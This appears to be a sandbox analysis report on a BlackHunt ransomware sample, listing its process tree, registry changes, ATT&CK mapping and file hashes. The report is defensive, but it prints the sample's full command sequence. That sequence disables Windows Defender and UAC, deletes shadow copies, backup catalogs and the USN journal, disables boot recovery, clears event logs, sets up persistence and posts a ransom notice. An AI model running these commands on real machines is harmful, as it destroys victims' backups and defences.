description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe"C:\Users\Admin\AppData\Local\Temp\27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2848 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2716
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2880
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2516
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2548
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1880
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2520
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1572
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe" /F2⤵PID:1436
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe" /F3⤵
- Creates scheduled task(s)
PID:3064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:776
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2900
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2808
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:324
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:804
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:452
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1696
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:904
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:620
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:576
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2912
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2832
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2840
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:948
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:320
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1744
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1752
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1652
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2788
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1740
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2964
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2480
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2444
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2748
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2624
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2688
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2616
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2564
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2316
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:2436
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:1460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3896
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:1660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3956
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:1492
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:1288
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:2996
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1592
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2944
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2828
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2376
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2864
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2584
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:948
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2744
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2084
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:2268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:1668
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:2796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2196
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2512
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:4024
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:1856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:2548
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2780
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:1684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:312
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2468
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\27749c116275c2843400bcf8db34428d8ed80072a3869bd5ba6255b5e34b8495.exe"2⤵
- Deletes itself
PID:780 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2680
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2696
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1196
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:572
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:304
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:112
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:1644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:700
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:1592
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:2804
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:2540
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:2960
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:1656
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:2488
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2060
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2676
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1324
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1876
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5e1c9d3ce7390f56f45d1c05c23f1fdd4
SHA15f0a7248824875cb3feb80ac6092815a6791f9f5
SHA2566b07c0feec931d8a0c09bfac28ab8b1f2f09ab372ce6c95828b4c42737e64833
SHA512b7ddfea25b2e1ae3c9171ad2ac7ab26b5272c294d6d02e574e6fd715eefad17ed418b181a34fb80088acb1b8d89b6334b6176f1d7bea9e89751d93c8a8c959a8
-
Filesize
12KB
MD5918564a3d1a3acb749e02704fc54b07a
SHA13f18d90970e235f8b9489335eb7bba8ed179d3b3
SHA25629f4e03beb7670b68ecd94a18901afcf605ea22ae51588acaf610a05fab53230
SHA51224961ff323fa8ba90e499b7fc2619a86843234cc7d96b27b82cbb399ab21a6d97eeebbb74a699f27829c73b60d3d32db18ebe4e813e76fd38016a4486952adac
-
Filesize
684B
MD5bc0c0276198cd18fcedb8c4d31c0ae33
SHA16331b2c9eb63d97f5dfd5bc9542820b51e6a36d6
SHA256483cb1755b43d27b281f7879348c300df661148611cb4c9c03877ff23cea190a
SHA5125234f2ef4554b64fd7d7425fc2ce346a8fb793b0e5a7ef932945318282b5c6c3ab9606091fe11b60a6bc0979c4339ebadfc24cf71c4750505837ddb09ade1110